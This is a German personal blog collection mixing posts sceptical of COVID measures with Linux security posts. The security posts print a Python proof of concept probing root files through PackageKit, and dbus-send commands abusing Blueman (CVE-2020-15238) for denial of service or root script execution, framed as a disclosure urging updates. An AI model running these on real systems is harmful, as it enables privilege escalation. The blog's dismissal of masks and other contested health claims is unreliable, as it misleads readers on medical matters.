CoronaChroniken: Was geht da in Frankreich ab?

Liebe Maskierte,

da auch Ihr bald wieder kaserniert werdet, obwohl bei uns eigentlich nichts spannendes passiert ( Neuinfektionszahl wieder ein bisschen gestiegen ), schauen wir uns doch mal unseren Nachbarn Frankreich an.

CoronaChroniken: Was geht da in Frankreich ab?

Vor 2 Tagen hatte ich ja noch eine leichte Entspannung im Graphen drin, die ist aber mit den Nachkorrekturen der Neuinfektionszahlen für Deutschland dann, wie befürchtet, verschwunden. Damit ist der Trend bei uns auch weiter „Aufwärts immer, Abwärts nimmer!“, also genau das was man am Anfang der Winterzeit erwarten würde.

Die Franzosen dürfen ab heute nur noch für eine Stunde am Tag zum Sport nach draußen und benötigen selbst zum Spazierengehen, Einkaufen oder den Arztbesuch einen Passierschein ( A38 vermutlich ). Örtlich ist man auf einen Radius vom 1km um den Wohnort beschränkt. Alle entbehrlichen Firmen werden geschlossen, komischerweise bleiben die Schulen offen. Die Maßnahme ist bislang bis zum 1.Dezember befristet.

Die Neuinfektionen lagen in Frankreich zuletzt bei 46.500 Neuinfizierten am Tag. Das ist schon eine Hausnummer die schnell noch größeres erwarten lässt. Frankreich hält für uns alle aber eine Überraschung parat:

(C) EuroMOMO.eu

Genau wie Berlin, liegt die Sterblichkeit in Frankreich am unteren Grenzwert wenn nicht sogar im Bereich der Untersterblichkeit. Wer da mal sein Bundesland sehen möchte, schreibe bitte seine Gesundheitsministerin oder Minister an, auf daß dieser die Zahlen an EuroMOMO ( empfohlen vom RKI übrigens ) melden solle. Ich habe das getan. Warum das nicht das Bundesamt für Statistik macht, verstehe ich auch nicht. Ist das etwa ein Staatsgeheimnis, wieviele Menschen hier so sterben? Ich denke nicht.

Was jetzt?

Auf der Bundespressekonferenz gestern waren Mediziner von den größten Kliniken aus Nord/Ost/Süd/West vertreten und haben ein bisschen den aktuellen Stand bei Ihnen erklärt. Das größte Problem derzeit sind nicht die fehlen Betten, sondern die fehlenden Pfleger, denn freie Betten gäbe aktuell auf dem Papier jede Menge. Wenn man aber kein Pflegepersonal hat, nutzt das nichts. Als, ich kann es nicht anders nennen, Verzweiflungstat würde ich den Vorschlag werten, doch alle geplanten Operationen abzusagen und die OP-Kräfte an die Betten zu schicken. Das mag für eine Hüftop noch gehen, aber spätestens bei Krebsops wird das problematisch.

Da muß man jetzt die Politik mal fragen: Was habt Ihr eigentlich die letzten 6 Monate gemacht, außer den Teufel an die Wand zu malen? Wo sind die 6 Monate lang ausgebildeten Hilfspflegekräfte, die man jetzt bald bräuchte? Es gab ja schliesslich genug Soloselbstständige, Künstler und andere arbeitslose Menschen, die sicher nicht nein gesagt hätten. Die Kliniken haben Ihre Hausaufgaben gemacht und sich umstrukturiert und damit Ihre Bettenkapazitäten hochgeschraubt. Jetzt fehlen Pfleger und das ja nicht erst seit gestern.  Ich denke, man nennt es Politikversagen. Da ruf ich natürlich auch lieber nach mehr nutzlosen Maßnahmen, als daß ich mein langjähriges Versagen zugeben würde.

Es ist ja auch viel wichtiger, ob man das jetzt „Pfleger und Pflegerinnen“ oder „Pfleger:innen“ oder „Pfleger*nnen“ nennt. An so etwas geilen sich Leute auf, die keine existierenden Probleme lösen wollen, sondern nur heiße:re Luft von sich geben möchten. Wer sich angesprochen fühlt, weiß, daß in ihrem oder seinem Leben etwas schief läuft. Geht Probleme an, die Menschen direkt helfen: Umweltverschmutzung durch Plastik z.b. Ein Beschluss „Lebensmittel kommen nicht mehr mit Plastik in Kontakt“ und die Sache erledigt sich quasi von alleine. Eine weitere große Hilfe wäre so etwas „Auf Lebensmittels, die in gleicher oder besserer Qualität vorort angebaut werden können (Knoblauch z.b. )  gibt es einen entfernungsabhängigen Umweltverschmutzungszoll. Nichts mehr mit Subventionen, sondern Strafen wären die Folge. Das erspart uns dann den sehr fragwürdigen Chinesischen Bio-Knoblauch, statt des deutschen Knoblauchs, den es zwar gibt, der aber mehr Geld kostet, weil der Bauer auch seine Rechnungen bezahlen können muß.

Zurück zu uns

Wer hat sich im Supermarkt, in einer Gaststätte, in einem Restaurant, bei C&A mit Corona angesteckt? Dachte ich mir. Wieso machen wir dann das, was wir derzeit tun? Weil einige wenige Ausnahmen reichen um den Bias ins falsche Licht zu rücken. Mir tun die Gastronomen und Kleinkünstler echt leid, die meisten reißen sich den Arsch auf, machen früh auf und spät zu, erfüllen die Auflagen und sind jetzt wieder die Gelackmeierten. Weniger Verständnis habe ich für Helge Schneider, der Herrn Scholz empfohlen hat einen Jahresdurchschnitt zu erstatten, statt den Vorjahresmonat als Basis heranzuziehen, weil er ja letzten November nichts verdient hätte.

Was wirklich ein nachvollziehbares Problem in der Gastro ist, sind die wenigen (Berliner) Szenelokale, in denen man nicht mal aufs Klo kommt, weil die so derbe voll sind. Diese Ausnahmen sind es, die den anderen die Probleme bereiten und den „Möchtegern-Oberharter-Hund“-Politikern in die Hände spielen. Unseriöse, zum Glück amtslose, Vertreter des Public-Health-Management-Sektors fordern dann auch mal, daß die Polizei in Wohnungen kontrollieren sollte, wenn da mehr als 2 Leute am Fenster rumschleichen. Es gehören immer noch zwei Dinge dazu Herr L.: eine Person, die anstecken kann, und Personen die angesteckt werden können, die wieder zu einem Grad infektiös werden, um erneut als die eine Person zu gelten.

Um den Abschluß mit Frankreich zu bekommen, was ist an einem Bewegungsradius so hilfreich? Es spielt doch nur eine Rolle, wievielen Menschen ich begegnen könnte, und nicht wo das dann genau ist. Außer natürlich, man möchte irgendwann mal die Stadtviertel abschotten können, dann wäre es hilfreich, wenn die Betroffenen alle am selben Ort wären. Das könnt Ihr Euch noch drauf freuen, was da kommen könnte.

 

 

D-BUS: Schwachstellen mit Blueman und PackageKit

Da weiß man gar nicht, wie man anfangen soll, aber .. am Anfang war … D-BUS 🙂  Im neuen Ubuntu 20 … UPDATE: FEDORA 31 & 32 AUCH BETROFFEN …  wurden einige Sicherheitslücken gefunden, mit denen sich u.A. Dateien von Root finden lassen, auf die der Angreifer so gar nicht zugreifen könnte. Ob sich das nur auf Ubuntu bezieht, wird man sehen müssen.

D-BUS: Schwachstellen mit Blueman und PackageKit

Eine Information Disclosure Schwachstelle gibt es im Umgang mit D-BUS und PackageKit, so daß man als normaler angemeldeter Benutzer die Existenz von Dateien prüfen kann, die eigentlich nur Root überhaupt sehen könnte, bspw. alles was im /root/ Directory drin ist:

import dbus

bus = dbus.SystemBus()

apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")  

trans = apt_dbus_interface.CreateTransaction()

apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")

apt_trans_dbus_interface.InstallFiles(0, ["/root/.bashrc"])

Möglich macht das eine mangelnde Prüfung, ob der User überhaupt autorisiert ist, diese Anfrage stellen zu dürfen.Es stellt sich raus, Fedora 31 und 32 sind auch von der Schwachstelle betroffen und so sieht das dann aus:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.MimeTypeNotSupported: MIME type ‚text/plain‘ not supported /root/.bashrc

Das ist die Antwort für eine Datei, die vorhanden ist. Nachfolgend der gleiche Ablauf für eine Datei, die nicht vorhanden ist:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc333“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.NoSuchFile: No such file /root/.bashrc333

Beurteilung:

  • – Man muß auf dem System als Benutzer angemeldet sein.
  • – Man muß sich mühseelig jede Datei einzeln vornehmen, was sich etwas automatisieren läßt, also schon wissen, was man sucht.
    – Man kann nicht auf den Inhalt schliessen.
  • – Es läßt sich so aber einfach feststellen, ob bestimmte Software installiert ist.

Ich halte die Lücke für nicht ganz so gravierend, man sollte sie aber schliessen. Bugreport an Fedora ist raus.

Blueman Local Privilege Escalation or Denial of Service (CVE-2020-15238)

Die Blueman Lücke ist deutlich schlimmer, da man darüber Befehle ausführen kann. Das läßt sich zudem trivial ausnutzen:

dbus-send --print-reply --system \
  --dest=org.blueman.Mechanism \
  /org/blueman/mechanism \
  org.blueman.Mechanism.DhcpClient \
  string:"ens33 down"

ens33 ist das Netzwerkinterface. Funktionieren tut das aber nur dann, wenn auch der dhcpcd installiert ist, was nicht zwangsweise so sein muß. Der Fedora Default ist der dh_client, der so scharf kontrolliert, was man ihm da über den D-BUS übergibt, daß man diese Lücke nur für einen DOS, aber nicht für die Local Privilege Escalation Attacke ausnutzen kann. Die würde so funktionieren:

dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/bashscript"

Also vorher ein Script anlegen, daß root dann ausführen darf => GGS .. Ganz Große Scheiße!

Wenn Ihr also Blueman und Ubuntu 20 benutzt, dann sorgt doch mal für ein paar Updates auf Eurem System 😉

 

 

CoronaChroniken: LOCKDOWN AB MONTAG!

BRANDAKTUELLE MELDUNG: LOCKDOWN AB MONTAG!

Wie Bild aus der Telefonkonferenz der Regierung erfahren haben will, soll ab Montag 2.11. der Lockdown kommen.

Wenn Betriebe geschlossen werden, sollen diese bis zu 75% Ihres Umsatzes aus dem Vorjahresmonat aus dem Staatssäckel bekommen, OHNE PRÜFUNG! Herr Scholz rechnet mit 7-10 Milliarden Euro pro Monat Lockdown!

Und das Angesichts dieser eigentlich Meldung heute:

Liebe Maskierte,

die Stadt Braunschweig war mal so frei ein Gebiet zu definieren, in dessen Grenzen man eine MNB tragen muß, da sonst eine Ordnungsstrafe von 25.000 € droht, auch wenn man nicht krank ist, oder nicht mehr krank werden kann. Wer sich da tagesaktuell informieren will, findet das PDF hier: braunschweig.de / 2020-10-28_allgemeinverfuegung_mund-nasen-bedeckung_innenstadt

CoronaChroniken: ups, Neuinfektionen rückläufig?

Aus Sicht der reinen Zahlen kann Anfang der Woche ein erfreulicher Abwärtstrend erkannt werden. Da wir wegen des Meldeverzugs erst grobe Zahlen haben, kann sich dies natürlich jederzeit ändern:

Die Sterbefälle werden dann die Tage nachgereicht, wenn Sie verfügbar sind. Einen Wert konnte ich schon aufschnappen, daher der rote Sprung auf 25.

In deren Nachrichten

Die Polizei Braunschweig zeigt sich mit den Corona-Sperrstundenkontrollen sehr zufrieden, wird aber daran keine Freude finden, wenn das Beispiel als Osnabrück Schule macht:

26.10.2020 – Gericht kippt Sperrstunde Osnabruecker – Gastronom darf oeffnen

Per se ist halt nichts ein (neudeutsch) Corona-Spreading-Event, dies hält allerdings keinen auf. Im Landkreis Peine ist es schon soweit, daß die Mitarbeiter von kleinen Firmen auf dem Dorfe, bei der Arbeit eine Maske tragen sollen, wenn mehr als eine Person im Zimmer ist.

Erneuter Lockdown ab Montag

Mir ist jetzt schon klar, was in den nächsten Tagen so alles ablaufen wird. Im Spiel „Wer fordert die nächst schärfere Maßnahme“ liegt die Bundesregierung jetzt einen Punkt vorn, das kann Herr Söder natürlich nicht auf sich sitzen lassen und wird knallhart nachziehen. Das der Beschluss kommt, wo gerade ein Abwärtstrend begonnen hat, paßt irgendwie ins Bild. Die wirkungslose Maskenpflicht kam ja auch erst, als der Abwärtstrend im April schon eingesetzt hatte! Töööörö!

Das RKI betont ja immer, daß diese Graphen das Geschehen 1-2 Wochen vorher wiederspiegeln, wenn dem so ist, dann kommt dieser Lockdown 2 Wochen zu spät. Dies wird natürlich niemanden davon abhalten später laut zu brüllen, daß es ja nur diesem knallharten Event zu verdanken war, daß die Zahlen dann zurück gingen. Noch habt Ihr ja die Freiheit, das zu glauben, oder es sein zu lassen.

Aus Israel kam neulich von einem Philosophen der Gedanke, daß man ja später den Leuten das Messer auf die Brust setzen kann: „Endweder Ihr seid für einen Überwachungsstaat, der all Eure Kontakte im Namen der Infektionsbekämpfung verfolgt und übermittelt, oder Ihr werden im Lockdown halt arbeitslos.“  Wie würdet Ihr Euch da entscheiden?

Das es da mehr als die zwei Optionen gibt, steht natürlich nicht in dem Planspiel. Die naheliegenste Option kann man gerade in Italien erleben, da gibt es derzeit Straßenschlachten mit der Polizei gegen die Corona-Maßnahmen der Regierung. Aus so einer flächendeckenden Straßenschlacht wird dann schnell mal eine Revolution, welche im Übrigen jetzt bereits von der Aluhutfraktion gefordert wird. Da sollte man als Regierung jetzt deutlich mehr Hirn in seine Entscheidungen investieren, finde ich.

Libreoffice: Das Spreadsheet of Death

Vor einigen Wochen fiel jemandem auf, daß sein PC jedes mal lahmte, wenn er im LibreOffice eine bestimmte Tabelle ansah und editieren wollte. Das Tabellenblatt war aber gar nicht so groß, wie man glauben könnte, aber es war …

Das Spreadsheet of Death

Was passiert mit einem Linuxsystem, wenn der Xorg-Serverprozess bei 100% ankommt? Es bleibt faktisch stehen. Wer das mal live mit Libreoffice auf einem Ryzen 1500X erleben will, der kann sich noch dies Dokument ziehen: Das Spreadsheet of Death Beispiel. Das richtige ist leider wegen Datenschutz nicht öffentlich verfügbar und war ein bisschen länger.

Die Ursache ist, daß der Spellchecker, also die Rechtschreibkorrektur, alle Feldinhalte immer und immer wieder prüft, für falsch betrachtet und dann mit einem neuen Antialising-Malframework einen blauen oder roten Krikkel unter den Feldeintrag zeichnet.  Das neue Framework ist aber so inperformant, daß der Xorg Prozess auf einem CPU Kern bei 100% Last arbeitet.

Bei jedem Scrollen geht die Rechtschreibkorrektur wieder von vorn los, was direkt zum zähesten PC Erlebnis ever führt.  In TOP sah das dann so aus:

[~]$ top -c -b -n 1 | head -n 20
top - 11:54:26 up  2:01,  1 user,  load average: 0,51, 0,28, 0,20
Tasks: 409 total,   2 running, 407 sleeping,   0 stopped,   0 zombie
%Cpu(s): 14,2 us,  2,1 sy,  0,0 ni, 83,0 id,  0,0 wa,  0,0 hi,  0,7 si,  0,0 st
MiB Mem :  15967,5 total,   5456,9 free,   5122,1 used,   5388,4 buff/cache
MiB Swap:   7810,9 total,   7810,9 free,      0,0 used.  10141,6 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
   1957 root      20   0  857132 191608 150596 R 100,0   1,2   6:16.45 /usr/libexec/Xorg vt2 -displayfd 3 -auth /run/u+
   2452 marius    20   0 3841504 252908 104348 S   6,2   1,5   4:15.81 cinnamon --replace
  13809 marius    20   0  126080  10728   8724 S   6,2   0,1   0:01.11 ssh -C -Y xxx@yy.yy.yy.yy
  14410 marius    20   0  116004   4228   3412 R   6,2   0,0   0:00.02 top -c -b -n 1
      1 root      20   0  171508  15268   9792 S   0,0   0,1   0:04.67 /usr/lib/systemd/systemd --switched-root --syst+
      2 root      20   0       0      0      0 S   0,0   0,0   0:00.01 [kthreadd]
      3 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 [rcu_gp]
      4 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 [rcu_par_gp]
      6 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 [kworker/0:0H-kblockd]
      7 root      20   0       0      0      0 I   0,0   0,0   0:03.58 [kworker/u16:0-kcryptd/253:0]
      8 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 [mm_percpu_wq]
      9 root      20   0       0      0      0 S   0,0   0,0   0:00.08 [ksoftirqd/0]
     10 root      20   0       0      0      0 I   0,0   0,0   0:02.65 [rcu_sched]

Das wurde nicht nur über den Bugzilla von RedHat berichtet, sondern auch von anderer Seite an die Entwickler bei LibreOffice gemeldet. Daher gibt es jetzt, so gefühlt 4 Monate später, einen Bugfix:

https://cgit.freedesktop.org/libreoffice/core/commit/?id=bdd149b1ff3d43b94cadc0d43365100c287c7639

Improve spell checking performance and impl. in several ways:
* do synchronous spell checking, avoiding an idle handler
* avoid continuous invalidations caused per-cell by spell-checking
* cache spell-checking information for a given SharedString to avoid repeated checking of frequently recurring strings.

 

Das mit dem Cache für gleiche Inhalte hätte man glaube ich bei Version 0.1 einbauen sollen, das ist nämlich naheliegend 😉

Jetzt fragt Ihr Euch, wieso berichte ich erst jetzt davon… Tja, „a maliciously crafted document can lead to a DOS like attack on linux“. Das wollten wir natürlich nicht noch fördern 😉  Es werden zwar nur die sichtbaren Zeilen geprüft, aber alle Spalten. Da jetzt der Patch vorliegt und verteilt wird, kann man es ruhig erzählen 🙂

CoronoChroniken: Nicht schon wieder!!!

Liebe Maskierte,

ich muß mit Euch schimpfen.. WER WAR DAS!?!?!?!?! 🙂

CoronoChroniken: Nicht schon wieder!!!

 

Leere Regale bei Aldi 24.10.2020

Leere Regale bei Aldi 24.10.2020

Die Menschen hamstern schon wieder. Kann echt nicht wahr sein, dabei hatte doch der Frühling gezeigt, daß es da gar keine Probleme gibt und da sind deutlich mehr Menschen schwer an dem Virus erkrankt. Was ist bitte mit Euch los? Ist Euch klar, daß das eine selbst erfüllende Prophezeiung  ist? Je mehr Hamstern, desto mehr müssen die anderen auch hamstern was noch da ist, was den Anschein des Mangels beflügelt.

In anderen Nachrichten haben wir heute morgen interessant Artikel gefunden:

Laut einer Pre-Print-Studie aus Norwegen, hängt es von der Blutgruppe ab, wie hoch das Risiko schwer zu erkranken ist. Die Blutgruppen Null und B haben eher ein geringes Risiko, Menschen mit Blutgruppe A sind mit einer 50:50 Chance leider nicht so gut dran.

Eine Forschergruppe aus Marburg hat dagegen gute Nachrichten für alle, da ein Stimmungsaufheller namens Prozac, der als Mittel seit Jahrzehnten zugelassen, gut verträglich, weit verfügbar, billig ist und vor allem, gegen Coronaviren wirkt. Er kann daher in der Therapie eingesetzt werden. Das Medikament hemmt die Verbreitung von Viren im Körper.

Quelle: https://amp.n-tv.de/wissen/Prozac-wirkt-gegen-Covid-19-article22120075.html

Zu den Zahlen

Bevor wir uns die neusten Zahlen anschauen, muß ich vorwegschicken, daß es nicht unerwartet kommt, daß bei einer Verbreitung des Virus, auch die Sterbefälle wieder ansteigen werden. Diese sind ja künstlich niedrig gehalten worden, durch den Lockdown im März.

Der Knick da am 19.10. ist ein mathematisches Artefakt aufgrund der Schwankungen im 7d Delta.

In diesem Bild wurden die Skalen angepaßt, nicht um die Sterbefälle klein zu halten, sondern um die Toten ins. im Verhältnis der letzten Graphen zeigen zu können, denn die Skala ist ja auch gestiegen.

Die Stadt Braunschweig ist der Meinung, daß man auf engen Plätzen, wer definiert sowas eigentlich?, jetzt auch im Freien Maske tragen müßte. Das ist der nächste Schritt im Regentanzkarusell. Die Maßnahme bringt nichts, also machen wir mehr davon, irgendwann wird schon was passieren. Das mit dem „passieren“ stimmt, aber es hatte dann nicht das mit dem Regentanz zu tun.

Ich freue mich schon auf die Geschichtsbücher der nächsten 200 Jahre, wenn die unsere Generation als die „Ära der digital Primitiven“ bezeichnen werden, die mit primitivem Aberglauben eine Infektionkrankheit bekämpft haben. Setzt natürlich voraus, daß die Menschheit es bis dahin schafft und da sieht es ja nicht wirklich nach aus, wenn man mal ehrlich ist. Vielleicht wirds ja wie bei Mad Max.

Wer mal was zu lachen haben will, der kann den „Wissenschaftsartikel“ im Spiegel lesen:

https://www.spiegel.de/wissenschaft/medizin/corona-nach-aussagen-von-aerztekammer-praesident-was-fuer-die-wirksamkeit-von-masken-spricht-a-b66831a5-3fb5-4ec7-8b4a-23d2419fb4e7

Achtet mal drauf, wie oft die Worte „könnte“, „möglicherweise“ und andere Konjunktive  in einer Auflistung vorkommen, die für die Wirksamkeit von Alltagsmasken sprechen sollen. Am schärfsten fand ich ja diesen Satz im Bezug auf eine Lancet Studie : „Masken könnten demnach das Infektionsrisiko möglicherweise deutlich senken, die Schätzungen schwanken zwischen zehn und 14 Prozent.“ und um was für einen Wert schwanken die Bitte oder ist das der Endwert? Weil mit 10% Schutzwirkung, kommt man nicht weit. Selbst 50:50 wäre noch besser. Was haben die da eigentlich geprüft? Kan man leider gerade nicht prüfen, weil deren Webserver offline sind. Gestern war übrigens Nature nicht zu erreichen, da wollte ich mir auch eine Studie ziehen. Das ist doch komisch oder? Das RKI war gestern auch kurz weg.

Die angeblichen Tests unten mit „Geschirrtüchern => 70% Schutzwirkung“ sind ohne den Virus und dessen realer Größe nicht aussagekräftig, so wie PCR-Tests ohne CT Faktorangabe. Der Covid-19 ist einer der kleinen Vertreter von Viren. Es gibt auch große Viren mit fast 2 Millionen Basenpaaren an DNA Code, die sind teilweise besser ausgestattet mit Basenpaaren als manche Lebensformen :). Tip an die Viren: Augen auf bei der Wahl der aufgenommenen Gensequenzen! 😉

 

Thunderbird 78.3.1 Update mit kleinen Themebugs

Das Update von Thunderbird 78.3 ist nicht ganz so gut gelaufen, wie es sollte.

Thunderbird 78.3.1 Update mit kleinen Themebugs

Das gestern von Fedora präsentiere Update auf Thunderbird 78.3.1 hat leider kleine Bugs bei der Themeimplementierung:

Das bekommt man, wenn man die Themes umstellt von Default -> Dark -> Light -> Default  🙂

Als Folge sind Highlights dann weiße Schrift auf weißem Hintergrund, auch bekannt als die ostfriesische Nationalflagge.

Beheben läßt sich das zum Glück ganz einfach: Theme auswählen und Thunderbird neustarten.

Und auch beim Layout des „Neue Email schreiben“ Fensters gibt es kleine, wenn auch nicht sofort ersichtliche Fehlinterpretationen von „Das soll so sein“ :

Ich glaube nicht, daß es soooo geplant war 😉

Ganz klar, die alte Version mit An:, CC: und BCC: untereinander war IMHO besser, wird aber vermutlich ein ähnliches Verhalten gehabt haben. Der Fehler, wenn man so will, ist hier eigentlich, daß man es überhaupt soweit aufziehen kann, obwohl die UI Elemente das gar nicht nötig haben. Da fehlt so etwas wie ein max-height: im CSS 😉

Was man in den Bildern jetzt nur ganz schlecht zu erkennen ist, daß sich auch der Default Icon Satz geändert hat. Er entspricht jetzt einem HIGH-Contrast Iconsatz für sehbehinderte Menschen. Das ist nicht nur mir ausgefallen. Auch dies wurde Thunderbird als Bug gemeldet, denn im System ist „Gnome“ als Iconsatz eingestellt und da hat sich TB bislang auch dran gehalten.

Der neue Iconsatz ist zu dem etwas größer bei den Element-Abständen eingestellt, was zwar auf einem Tablet besser sein wird, aber leider bei einem 20 Konten. mit jeweils 40 Unterordnern, Thunderbird nur eine unnötige Platzverschwendung darstellt.

Die Thunderbird-Telemetriedaten

Nicht ganz so erfreulich, aber zum Glück abwählbar, ist die Zwangsaktivierung der Telemetriedaten.

Diverse Nutzer, meine Wenigkeit inklusive, konnten nachweisen, daß die Übermittlung der Telemetriedaten an Thunderbird vor dem Update ausgeschaltet war und automatisch aktiviert wurde. Ihr solltet das also genau prüfen, wenn Ihr jetzt 78.3.1 oder schon 74.x bekommen habt.

Hier könnt Ihr das abschalten:

Wie man sehen kann, war das die Schwarz-Weiße-Phase nach dem Themewechseltest 😀

Die Thunderbird Devs sind dran, auch wenn Sie wenig begeistert waren, daß mehrere Fehler in einem Bugreport gemeldet wurden. Das bringt mich auch gleich zum Abschluß, denn ..

Eine Sache muß ich noch gerade ziehen

Ich hatte heute morgen einen Datenschutzverstoß von Thunderbird gemeldet. Dieser konnte gegen 21 Uhr zu meiner Zufriedenheit von den Thunderbird Devs aufgeklärt werden und ist damit erledigt. Die Datenschutzbeschwerde beim LFD und BFD bereits durch mich zurückgezogen und als erledigt erklärt worden.

Damit Ihr diese Nachricht auch findet, wenn Ihr der alten Artikelurl folgt, wurde dieser Artikel als Ersatz eingestellt. Das ist also der Grund wieso Ihr etwas anderes gesehen habt, als Ihr vielleicht erwartet habt.

 

Nemo: kleines Datenspurenproblem

Moin,

auf der Suche nach einer Erklärung wieso Nemo ständig mit unsortierten Verzeichnislisten startet, statt der eingestellten alphabetischen Reihenfolge, stieß ich auf ein kleines Datenspurenproblem.

Nemo: kleines Datenspurenproblem

Nemo, der Dateiexplorer von Cinnamon, merkt sich die Position jedes Icons auf dem Desktop in einer Datei: ~./config/nemo/desktop-metadata

Wenn man wie ich noch Restbestände aus der Steinzeit des Digitalen Films vorrätig hat, damit man bei Internetausfall, NetFlixpleite oder Implosion von Amazon+ noch Unterhaltung einspielen kann, hat man ein Problem. Auch wenn Ihr häufig Live-Images mountet, USB Sticks benutzt oder sonstige Laufwerke auf Eurem Desktop aufpoppen habt, dann seid auch Ihr von der Nemo-Datenspuren-Panne betroffen.

Jedesmal, wenn ein Laufwerk gemountet wird, erscheint dazu ein Icon auf dem Desktop. Ein Icon auf dem Desktop muß eine Position haben und die muß man als Desktopmanager speichern. Das passiert in obiger Datei.

Am Ende sieht diese Datei dann leider so aus:


[mtp.volume]
nemo-icon-position=91,834
monitor=0
icon-scale=1
nemo-icon-position-timestamp=1499790545

[THE_HOBBIT_AUJ_EXTENDED_PART_2.volume]
nemo-icon-position=221,34
monitor=0
icon-scale=1
nemo-icon-position-timestamp=1507039069

Damit speichert diese Datei leider mehr als genug um interessant zu sein: Name und Datum der Erstsichtung des Mediums. Alleine schon, daß man sehen kann, welchen Film man sich angesehen oder welchen USB Stick man benutzt hat, ist schon erschreckend, aber dazu noch das Datum + Uhrzeit auf die ms genau, ist ein Log das nicht sein sollte.

Das merken des Datums ist für den Zweck außerdem völlig unnötig, außer man würde bei jedem mal, wenn man das Icon benutzt, den Stand aktualisieren und alle die Icons löschen, die seit X Monaten nicht mehr benutzt wurden. Das passiert leider nicht.

Um es Euch einfach zu machen, habe ich da mal was zusammen gebastelt:

$ grep timestamp desktop-metadata | sed -e „s/^.*=//g“ | awk ‚{print „date –date=\“@“$1″\““;}‘ | bash

Für etwas Wissbegierigere:

#!/bin/bash

ALISTE=$(cat $1)

for line in $ALISTE; do

if [[ "$line" == *"volume"* ]]; then
       echo $line;
fi

if [[ "$line" == *"timestamp="* ]]; then
       echo "$line"| sed -e "s/^.*=//g" | awk '{print "date --date=\"@"$1"\"";}' | bash
fi

done

kommt das bei raus u.a.:

[DIE_KAENGURU-CHRONIKEN.volume]
Di 8. Sep 17:11:15 CEST 2020
[Fedora-WS-Live-32-1-6.volume]
Di 29. Sep 17:58:48 CEST 2020
[Fedora-WS-Live-33_B-1-3.volume]
Do 1. Okt 13:04:21 CEST 2020
[Fedora-WS-Live-33_B-1-3.volume.2]
Mi 30. Sep 23:51:27 CEST 2020

[Kommentarspur: Ja ich geb es zu, ich hab ihn gesehen und er war nicht so toll. Ich hatte da mehr auf Jesus,Gott und die DNA Bombe gehofft 😀]

Da Volumen mit Icon auch alles das ist, was man per SSHFS, CUTEFS, FTPMOUNT usw. mountet, verrät diese Datei auch auf welchen Servern man unterwegs war.  Das sind alles META-Daten die nicht sein müßten.

Den Namen des Volumens könnte mit SHA256 hashen, mit einem per-PC-Salt natürlich, das Datum könnte als Löschdatum benutzt werden und so zur Selbstreinigung beitragen. Das sind nur minimale Änderungen, würden die ganze Sache aber komplett entschärfen!

Daher werde ich mich da mal wieder mit Scott rumprügeln müssen, da er dafür Verantwortung zeigt 🙁

Allemal sind diese und andere Dateien Ihres Types, ein Argument für eine pauschale Festplattenvollverschlüsselung beim Setup eines PCs.

CoronaChroniken: noch nicht statistisch relevant

Liebe Maskiert,

es hat ein bisschen gedauert, nun sind die Zahlen da.

CoronaChroniken: noch nicht statistisch relevant

Ohne großes Trara, kommen wir direkt zu den Grafiken:

Wie man unschwer erkennen kann, haben wir jetzt größere Infektionszahlen als im April, bei deutlich weniger Schwererkrankten und Sterbefällen. Der exponentielle Anstieg ist jetzt auch deutlich sichtbarer als noch vor einer Woche. Aber wie man unten sieht.. kein relevanter Anstieg entscheidenden Faktoren.

Durch einen kleinen Anstieg aufgrund von Korrekturen der Sterbefälle, ist die Extrapolation der „für Aprilzustände nötigen Fälle“ ein bisschen zurück gegangen, aber immer noch bei krassen 200.000 am Tag.

Aufgrund der Entwicklung bleibe ich bei meiner Meinung, daß hier gesamtbevökerungsmäßig nichts zu sehen gibt, was man nicht jeden Winter sehen würde, wenn man sich nur die Mühe machte, es zu erfassen.

In anderen Nachrichten

channelte Herr Lauterbach für die Bildzeitung Zahlen aus dem Nichts und kündigte 500.000 Neuinfektionen pro Tag  und 50.000 Todesfälle bis Weihnachten an. Nur nebenbei bemerkt, das ist ungefähr die Grippewelle von 2018. Leicht außen vor gelassen, haben andere Menschen darauf hingewiesen, daß nicht 70% sondern schon 40-45% Durchseuchung in der Bevölkerung ein Virus derart hemmen, daß seine Verbreitung erlahmt.

Da wir alle live bei diesem Experiment dabei sein werden, schauen wir doch mal, wer am Ende Recht hatte.

CoronaChroniken: Am Dienstag gibt es wieder neue Zahlen

Liebe Maskierte,

heute nur ein kleines Update, denn die wirklich interessanten Zahlen gibt es erst am Dienstag vom RKI.

CoronaChroniken: Am Dienstag gibt es wieder neue Zahlen

Trotzdessen bekommt Ihr jetzt schon erfreuliche Grafiken geliefert:

Ich habe hier mal ein bisschen an den Farben und Bezeichnungen gespielt. Der hellblaue ist wie immer die RKI-These „Was wir heute sehen ist eigentlich schon vor einer bis zwei Wochen passiert.“ Die gestrichelte Linie die täglichen Infektionszahlen von RKI. „(7d)“ meint 7-Tage-Durchschnitt.

